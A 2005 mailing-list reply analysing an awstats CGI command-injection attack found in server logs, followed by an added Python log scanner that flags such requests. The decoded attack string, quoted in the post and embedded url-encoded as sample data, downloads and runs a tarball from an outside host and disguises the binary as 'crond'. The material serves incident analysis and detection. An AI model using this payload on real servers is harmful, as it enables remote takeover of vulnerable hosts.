Security Breach
Paul Howarth
paul at city-fan.org
Fri Mar 4 19:30:23 UTC 2005
On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
>
> > Replace the url-encoded characters and you get:
> >
> > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
> > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
> > mech crond;export PATH=;crond;echo e_exp;%00
> >
> > So the attacker has tricked the script into executing a set of shell
> > commands, which include changing directory to /tmp, downloading a
> > tarball from a Romanian site, extracting that tarball and then executing
> > a program from the downloaded and extracted tarball, after renaming it
> > to "crond" in an effort to disguise it.
>
> Damned fine research. Good job; I'm impressed.
Thank you!
Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats
vulnerability.
Paul.
--
Paul Howarth <paul at city-fan.org>
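The url-decoding step Paul describes above is something a defender can automate over web server access logs. The following is an added example, not code from the original thread or from the awstats project: it parses Apache combined-format log lines, decodes the query string of requests to awstats.pl, and flags a configdir parameter that starts with a pipe, carries shell metacharacters, or ends in a null byte, which is the shape of the request quoted in the thread. The log format and the two sample lines are constructed for the example (the first reproduces the thread's url-encoded request, the second is a benign awstats request); field names such as `scan_log` and `inspect_line` are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Apache combined format. The first
# mirrors the url-encoded awstats request discussed in the thread; the second
# is an ordinary report request and should not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2005:17:10:02 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20%3Becho%20b_exp%3Bcd%20%2Ftmp%3Bcurl%20-0%20wget%20zburchi.idilis.ro%2Fbadboy.tar.gz%3Btar%20-zxvf%20badboy.tar.gz%3Bcd%20psybnc%3Bmv%20mech%20crond%3Bexport%20PATH%3D%3Bcrond%3Becho%20e_exp%3B%00 HTTP/1.1" 200 1843 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Mar/2005:17:12:45 +0000] "GET /cgi-bin/awstats.pl?config=www.example.org&output=main HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, protocol, status, bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that let a value reach the shell when awstats passed configdir
# to open() unsanitised: pipe, command separator, background, backticks, $.
SHELL_META = re.compile(r"[|;&`$]")


def decode_query(query):
    """Split a raw query string on '&' and url-decode each key and value.

    Splitting happens before decoding so that encoded ';' or '&' inside a
    value (as in the thread's request) stay part of that value. The split
    on '=' is done once, so 'export PATH=' inside a value survives intact.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def inspect_line(line):
    """Return a finding dict for a suspicious awstats request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith("/awstats.pl"):
        return None
    configdir = decode_query(query).get("configdir")
    if configdir is None:
        return None

    reasons = []
    if configdir.lstrip().startswith("|"):
        reasons.append("configdir begins with a pipe")
    if SHELL_META.search(configdir):
        reasons.append("shell metacharacters in configdir")
    if "\x00" in configdir:
        reasons.append("null byte in configdir")
    if not reasons:
        return None
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "decoded_configdir": configdir.rstrip("\x00"),
        "reasons": reasons,
    }


def scan_log(text):
    """Run inspect_line over every non-empty line and collect the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["timestamp"], "->", "; ".join(finding["reasons"]))
        print("  decoded:", finding["decoded_configdir"])
```

A status of 200 on a flagged line is worth noting when triaging: it means the script accepted the request rather than rejecting it, so the host should be treated as potentially compromised and checked for the artefacts the thread describes (new files under /tmp and an unexpected process named crond) rather than merely probed.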